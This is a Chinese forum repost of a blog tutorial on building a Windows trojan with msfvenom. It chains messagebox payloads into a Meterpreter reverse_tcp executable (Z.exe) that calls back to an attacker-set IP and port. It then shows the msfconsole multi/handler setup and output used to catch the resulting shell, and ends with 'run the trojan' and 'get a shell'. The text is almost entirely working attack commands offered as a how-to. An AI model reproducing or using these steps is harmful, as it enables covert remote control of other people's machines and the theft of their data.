Ken1Ve 发布于2022年11月4日 分享 发布于2022年11月4日 一:制作对话框msfvenom -a x86 --platform windows -p windows/messagebox TEXT="bbskali.cn" -f raw > messageBox-a:操作系统的类型 64位和32位-p:指定攻击平台 windowsTEXT:对话框中显示的文字-f:输出格式二:制作二级标题msfvenom -c messageBox -a x86 --platform windows -p windows/messagebox TEXT="blog.bbskali.cn" -f raw > messageBox2三:将c++打包生成exemsfvenom -c messageBox2 -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.209 LPORT=5555 -f exe -o Z.exeLHOST:本机ip地址LPORT:端口-o :生成文件四:终端启动msfconsole并配置参数msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(multi/handler) > set LHOST 192.168.3.209 LHOST => 192.168.3.209 msf exploit(multi/handler) > set LPORT 5555 LPORT => 5555 msf exploit(multi/handler) > exploit五:运行马儿六:得到shell 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/169.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。 链接帖子 意见的链接 分享到其他网站 更多分享选项…
推荐的帖子